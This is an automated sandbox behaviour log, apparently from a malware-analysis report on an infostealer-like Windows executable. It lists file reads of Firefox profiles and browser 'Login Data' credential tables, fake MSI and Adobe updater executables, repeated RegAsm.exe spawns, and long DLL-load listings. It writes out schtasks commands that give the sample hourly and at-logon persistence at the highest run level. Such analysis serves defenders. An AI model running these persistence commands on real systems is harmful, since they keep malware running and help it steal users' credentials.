                  Source: C:\Users\user\Desktop\tMO4FVIc9l.exeFile read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                  Source: C:\Users\user\Desktop\tMO4FVIc9l.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                  Source: tMO4FVIc9l.exe, 00000000.00000002.2257375774.000000000097D000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
                  Source: tMO4FVIc9l.exe, 00000000.00000002.2257375774.000000000097D000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: UPDATE %Q.%s SET sql = sqlite_rename_table(sql, %Q), tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
                  Source: tMO4FVIc9l.exe, 00000000.00000003.2143660806.0000000006115000.00000004.00000020.00020000.00000000.sdmp, tMO4FVIc9l.exe, 00000000.00000003.2144177194.0000000006125000.00000004.00000020.00020000.00000000.sdmp, rg706_nABxIULogin Data For Account.0.dr, Oh9vbPMur9FiLogin Data.0.dr, D7xhTl4YAcm4Login Data.0.drBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                  Source: tMO4FVIc9l.exeReversingLabs: Detection: 42%
                  Source: C:\Users\user\Desktop\tMO4FVIc9l.exeFile read: C:\Users\user\Desktop\tMO4FVIc9l.exeJump to behavior
                  Source: unknownProcess created: C:\Users\user\Desktop\tMO4FVIc9l.exe "C:\Users\user\Desktop\tMO4FVIc9l.exe"
                  Source: C:\Users\user\Desktop\tMO4FVIc9l.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /RU "user" /tr "C:\ProgramData\MSIUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\MSIUpdaterV202.exe" /tn "MSIUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7 HR" /sc HOURLY /rl HIGHEST
                  Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Users\user\Desktop\tMO4FVIc9l.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /RU "user" /tr "C:\ProgramData\MSIUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\MSIUpdaterV202.exe" /tn "MSIUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7 LG" /sc ONLOGON /rl HIGHEST
                  Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Users\user\Desktop\tMO4FVIc9l.exeProcess created: C:\Users\user\AppData\Local\Temp\spanDxygJpUhAdhw\xq6J5KlULX6jlR3rET0T.exe "C:\Users\user\AppData\Local\Temp\spanDxygJpUhAdhw\xq6J5KlULX6jlR3rET0T.exe"
                  Source: C:\Users\user\AppData\Local\Temp\spanDxygJpUhAdhw\xq6J5KlULX6jlR3rET0T.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                  Source: unknownProcess created: C:\ProgramData\MSIUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\MSIUpdaterV202.exe C:\ProgramData\MSIUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\MSIUpdaterV202.exe
                  Source: unknownProcess created: C:\ProgramData\MSIUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\MSIUpdaterV202.exe C:\ProgramData\MSIUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\MSIUpdaterV202.exe
                  Source: C:\ProgramData\MSIUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\MSIUpdaterV202.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                  Source: C:\ProgramData\MSIUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\MSIUpdaterV202.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                  Source: C:\Users\user\Desktop\tMO4FVIc9l.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3108 -s 2688
                  Source: unknownProcess created: C:\Users\user\AppData\Local\AdobeUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\AdobeUpdaterV202.exe "C:\Users\user\AppData\Local\AdobeUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\AdobeUpdaterV202.exe"
                  Source: unknownProcess created: C:\Users\user\AppData\Local\AdobeUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\AdobeUpdaterV202.exe "C:\Users\user\AppData\Local\AdobeUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\AdobeUpdaterV202.exe"
                  Source: C:\Users\user\AppData\Local\AdobeUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\AdobeUpdaterV202.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                  Source: unknownProcess created: C:\Users\user\AppData\Local\AdobeUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\AdobeUpdaterV202.exe "C:\Users\user\AppData\Local\AdobeUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\AdobeUpdaterV202.exe"
                  Source: unknownProcess created: C:\Users\user\AppData\Local\AdobeUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\AdobeUpdaterV202.exe "C:\Users\user\AppData\Local\AdobeUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\AdobeUpdaterV202.exe"
                  Source: C:\Users\user\AppData\Local\AdobeUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\AdobeUpdaterV202.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                  Source: C:\Users\user\Desktop\tMO4FVIc9l.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /RU "user" /tr "C:\ProgramData\MSIUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\MSIUpdaterV202.exe" /tn "MSIUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7 HR" /sc HOURLY /rl HIGHESTJump to behavior
                  Source: C:\Users\user\Desktop\tMO4FVIc9l.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /RU "user" /tr "C:\ProgramData\MSIUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\MSIUpdaterV202.exe" /tn "MSIUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7 LG" /sc ONLOGON /rl HIGHESTJump to behavior
                  Source: C:\Users\user\Desktop\tMO4FVIc9l.exeProcess created: C:\Users\user\AppData\Local\Temp\spanDxygJpUhAdhw\xq6J5KlULX6jlR3rET0T.exe "C:\Users\user\AppData\Local\Temp\spanDxygJpUhAdhw\xq6J5KlULX6jlR3rET0T.exe" Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\spanDxygJpUhAdhw\xq6J5KlULX6jlR3rET0T.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
                  Source: C:\ProgramData\MSIUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\MSIUpdaterV202.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
                  Source: C:\ProgramData\MSIUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\MSIUpdaterV202.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
                  Source: C:\Users\user\AppData\Local\AdobeUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\AdobeUpdaterV202.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                  Source: C:\Users\user\AppData\Local\AdobeUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\AdobeUpdaterV202.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                  Source: C:\Users\user\Desktop\tMO4FVIc9l.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\Desktop\tMO4FVIc9l.exeSection loaded: rstrtmgr.dllJump to behavior
                  Source: C:\Users\user\Desktop\tMO4FVIc9l.exeSection loaded: ncrypt.dllJump to behavior
                  Source: C:\Users\user\Desktop\tMO4FVIc9l.exeSection loaded: ntasn1.dllJump to behavior
                  Source: C:\Users\user\Desktop\tMO4FVIc9l.exeSection loaded: d3d11.dllJump to behavior
                  Source: C:\Users\user\Desktop\tMO4FVIc9l.exeSection loaded: dxgi.dllJump to behavior
                  Source: C:\Users\user\Desktop\tMO4FVIc9l.exeSection loaded: resourcepolicyclient.dllJump to behavior
                  Source: C:\Users\user\Desktop\tMO4FVIc9l.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\Desktop\tMO4FVIc9l.exeSection loaded: d3d10warp.dllJump to behavior
                  Source: C:\Users\user\Desktop\tMO4FVIc9l.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\Desktop\tMO4FVIc9l.exeSection loaded: dxcore.dllJump to behavior
                  Source: C:\Users\user\Desktop\tMO4FVIc9l.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Users\user\Desktop\tMO4FVIc9l.exeSection loaded: wininet.dllJump to behavior
                  Source: C:\Users\user\Desktop\tMO4FVIc9l.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Users\user\Desktop\tMO4FVIc9l.exeSection loaded: devobj.dllJump to behavior
                  Source: C:\Users\user\Desktop\tMO4FVIc9l.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Users\user\Desktop\tMO4FVIc9l.exeSection loaded: webio.dllJump to behavior
                  Source: C:\Users\user\Desktop\tMO4FVIc9l.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\tMO4FVIc9l.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\tMO4FVIc9l.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Users\user\Desktop\tMO4FVIc9l.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\tMO4FVIc9l.exeSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Users\user\Desktop\tMO4FVIc9l.exeSection loaded: fwpuclnt.dllJump to behavior
                  Source: C:\Users\user\Desktop\tMO4FVIc9l.exeSection loaded: schannel.dllJump to behavior
                  Source: C:\Users\user\Desktop\tMO4FVIc9l.exeSection loaded: mskeyprotect.dllJump to behavior
                  Source: C:\Users\user\Desktop\tMO4FVIc9l.exeSection loaded: ncryptsslp.dllJump to behavior
                  Source: C:\Users\user\Desktop\tMO4FVIc9l.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Users\user\Desktop\tMO4FVIc9l.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Users\user\Desktop\tMO4FVIc9l.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Users\user\Desktop\tMO4FVIc9l.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Users\user\Desktop\tMO4FVIc9l.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\tMO4FVIc9l.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\Desktop\tMO4FVIc9l.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\Desktop\tMO4FVIc9l.exeSection loaded: vaultcli.dllJump to behavior
                  Source: C:\Users\user\Desktop\tMO4FVIc9l.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Users\user\Desktop\tMO4FVIc9l.exeSection loaded: ntmarta.dllJump to behavior
                  Source: C:\Users\user\Desktop\tMO4FVIc9l.exeSection loaded: dpapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\tMO4FVIc9l.exeSection loaded: windowscodecs.dllJump to behavior
                  Source: C:\Users\user\Desktop\tMO4FVIc9l.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Users\user\Desktop\tMO4FVIc9l.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\tMO4FVIc9l.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Users\user\Desktop\tMO4FVIc9l.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Users\user\Desktop\tMO4FVIc9l.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Users\user\Desktop\tMO4FVIc9l.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Users\user\Desktop\tMO4FVIc9l.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Users\user\Desktop\tMO4FVIc9l.exeSection loaded: edputil.dllJump to behavior
                  Source: C:\Users\user\Desktop\tMO4FVIc9l.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                  Source: C:\Users\user\Desktop\tMO4FVIc9l.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Users\user\Desktop\tMO4FVIc9l.exeSection loaded: appresolver.dllJump to behavior
                  Source: C:\Users\user\Desktop\tMO4FVIc9l.exeSection loaded: bcp47langs.dllJump to behavior
                  Source: C:\Users\user\Desktop\tMO4FVIc9l.exeSection loaded: slc.dllJump to behavior
                  Source: C:\Users\user\Desktop\tMO4FVIc9l.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Users\user\Desktop\tMO4FVIc9l.exeSection loaded: sppc.dllJump to behavior
                  Source: C:\Users\user\Desktop\tMO4FVIc9l.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                  Source: C:\Users\user\Desktop\tMO4FVIc9l.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                  Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dllJump to behavior
                  Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: xmllite.dllJump to behavior
                  Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dllJump to behavior
                  Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: xmllite.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\spanDxygJpUhAdhw\xq6J5KlULX6jlR3rET0T.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\spanDxygJpUhAdhw\xq6J5KlULX6jlR3rET0T.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: aclayers.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mpr.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc_os.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: webio.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: fwpuclnt.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: schannel.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mskeyprotect.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ntasn1.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ncrypt.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ncryptsslp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dpapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wbemcomn.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wbemcomn.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\ProgramData\MSIUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\MSIUpdaterV202.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\ProgramData\MSIUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\MSIUpdaterV202.exeSection loaded: acgenral.dllJump to behavior
                  Source: C:\ProgramData\MSIUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\MSIUpdaterV202.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\ProgramData\MSIUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\MSIUpdaterV202.exeSection loaded: winmm.dllJump to behavior
                  Source: C:\ProgramData\MSIUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\MSIUpdaterV202.exeSection loaded: samcli.dllJump to behavior
                  Source: C:\ProgramData\MSIUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\MSIUpdaterV202.exeSection loaded: msacm32.dllJump to behavior
                  Source: C:\ProgramData\MSIUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\MSIUpdaterV202.exeSection loaded: version.dllJump to behavior
                  Source: C:\ProgramData\MSIUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\MSIUpdaterV202.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\ProgramData\MSIUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\MSIUpdaterV202.exeSection loaded: dwmapi.dllJump to behavior
                  Source: C:\ProgramData\MSIUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\MSIUpdaterV202.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\ProgramData\MSIUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\MSIUpdaterV202.exeSection loaded: mpr.dllJump to behavior
                  Source: C:\ProgramData\MSIUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\MSIUpdaterV202.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\ProgramData\MSIUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\MSIUpdaterV202.exeSection loaded: winmmbase.dllJump to behavior
                  Source: C:\ProgramData\MSIUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\MSIUpdaterV202.exeSection loaded: winmmbase.dllJump to behavior
                  Source: C:\ProgramData\MSIUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\MSIUpdaterV202.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\ProgramData\MSIUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\MSIUpdaterV202.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\ProgramData\MSIUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\MSIUpdaterV202.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\ProgramData\MSIUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\MSIUpdaterV202.exeSection loaded: aclayers.dllJump to behavior
                  Source: C:\ProgramData\MSIUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\MSIUpdaterV202.exeSection loaded: sfc.dllJump to behavior
                  Source: C:\ProgramData\MSIUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\MSIUpdaterV202.exeSection loaded: sfc_os.dllJump to behavior
                  Source: C:\ProgramData\MSIUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\MSIUpdaterV202.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\ProgramData\MSIUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\MSIUpdaterV202.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\ProgramData\MSIUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\MSIUpdaterV202.exeSection loaded: acgenral.dllJump to behavior
                  Source: C:\ProgramData\MSIUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\MSIUpdaterV202.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\ProgramData\MSIUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\MSIUpdaterV202.exeSection loaded: winmm.dllJump to behavior
                  Source: C:\ProgramData\MSIUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\MSIUpdaterV202.exeSection loaded: samcli.dllJump to behavior
                  Source: C:\ProgramData\MSIUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\MSIUpdaterV202.exeSection loaded: msacm32.dllJump to behavior
                  Source: C:\ProgramData\MSIUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\MSIUpdaterV202.exeSection loaded: version.dllJump to behavior
                  Source: C:\ProgramData\MSIUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\MSIUpdaterV202.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\ProgramData\MSIUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\MSIUpdaterV202.exeSection loaded: dwmapi.dllJump to behavior
                  Source: C:\ProgramData\MSIUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\MSIUpdaterV202.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\ProgramData\MSIUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\MSIUpdaterV202.exeSection loaded: mpr.dllJump to behavior
                  Source: C:\ProgramData\MSIUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\MSIUpdaterV202.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\ProgramData\MSIUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\MSIUpdaterV202.exeSection loaded: winmmbase.dllJump to behavior
                  Source: C:\ProgramData\MSIUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\MSIUpdaterV202.exeSection loaded: winmmbase.dllJump to behavior
                  Source: C:\ProgramData\MSIUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\MSIUpdaterV202.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\ProgramData\MSIUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\MSIUpdaterV202.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\ProgramData\MSIUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\MSIUpdaterV202.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\ProgramData\MSIUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\MSIUpdaterV202.exeSection loaded: aclayers.dllJump to behavior
                  Source: C:\ProgramData\MSIUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\MSIUpdaterV202.exeSection loaded: sfc.dllJump to behavior
                  Source: C:\ProgramData\MSIUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\MSIUpdaterV202.exeSection loaded: sfc_os.dllJump to behavior
                  Source: C:\ProgramData\MSIUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\MSIUpdaterV202.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: aclayers.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mpr.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc_os.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: acgenral.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winmm.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: samcli.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: msacm32.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: version.dllJump to behavior
